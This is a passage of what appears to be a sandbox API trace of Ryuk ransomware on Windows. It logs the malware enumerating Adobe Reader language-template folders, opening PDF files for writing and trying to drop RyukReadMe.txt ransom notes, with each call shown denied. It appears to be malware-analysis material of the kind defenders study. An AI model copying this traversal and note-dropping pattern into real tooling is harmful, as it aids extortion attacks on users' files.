10.0\\Reader\\IDTemplates\\CZE\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.311] GetLastError () returned 0x5 [0138.311] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.311] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.311] SetLastError (dwErrCode=0x0) [0138.311] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.311] GetLastError () returned 0x5 [0138.312] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.312] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.312] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.312] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.312] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.312] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.312] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.313] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.313] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.313] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.313] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.313] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.313] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.313] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.313] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.313] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.313] SetLastError (dwErrCode=0x0) [0138.314] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.314] GetLastError () returned 0x5 [0138.314] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.314] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.314] SetLastError (dwErrCode=0x0) [0138.314] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.314] GetLastError () returned 0x5 [0138.314] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.314] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.314] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.315] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.315] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.315] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.315] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.315] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.315] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.315] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.315] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.315] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.315] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.316] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.316] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.316] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.316] SetLastError (dwErrCode=0x0) [0138.316] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.316] GetLastError () returned 0x5 [0138.316] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.316] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.316] SetLastError (dwErrCode=0x0) [0138.316] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.316] GetLastError () returned 0x5 [0138.316] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.316] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.316] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.317] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.317] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.317] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.317] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.317] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.317] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.318] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.318] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.318] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.318] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.318] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.318] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.318] SetLastError (dwErrCode=0x0) [0138.318] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.318] GetLastError () returned 0x5 [0138.318] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.318] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.318] SetLastError (dwErrCode=0x0) [0138.318] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.319] GetLastError () returned 0x5 [0138.319] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.319] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.319] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.319] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.319] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.319] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.320] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.320] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.320] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.320] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.320] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.321] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.321] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.321] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.321] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.321] SetLastError (dwErrCode=0x0) [0138.321] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.321] GetLastError () returned 0x5 [0138.321] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.321] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.321] SetLastError (dwErrCode=0x0) [0138.321] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.322] GetLastError () returned 0x5 [0138.322] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.322] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.322] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\EUQ\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.322] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.322] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0138.322] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.322] SetLastError (dwErrCode=0x0) [0138.322] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\EUQ\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\euq\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.322] GetLastError () returned 0x5 [0138.322] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.322] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.322] SetLastError (dwErrCode=0x0) [0138.322] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.322] GetLastError () returned 0x5 [0138.322] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.322] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.322] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.323] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.323] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.323] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.323] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.324] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.324] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.324] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.324] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.324] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.324] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.324] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.324] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.324] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.325] SetLastError (dwErrCode=0x0) [0138.325] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.325] GetLastError () returned 0x5 [0138.325] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.325] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.325] SetLastError (dwErrCode=0x0) [0138.325] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.325] GetLastError () returned 0x5 [0138.325] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.325] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.325] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.325] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.325] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.325] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.325] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.326] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.326] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.326] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.326] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.326] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.326] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.326] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.326] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.326] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.326] SetLastError (dwErrCode=0x0) [0138.327] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.327] GetLastError () returned 0x5 [0138.327] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.327] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.327] SetLastError (dwErrCode=0x0) [0138.327] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.327] GetLastError () returned 0x5 [0138.327] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.327] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.327] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.328] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.328] FindNextFileW (in: 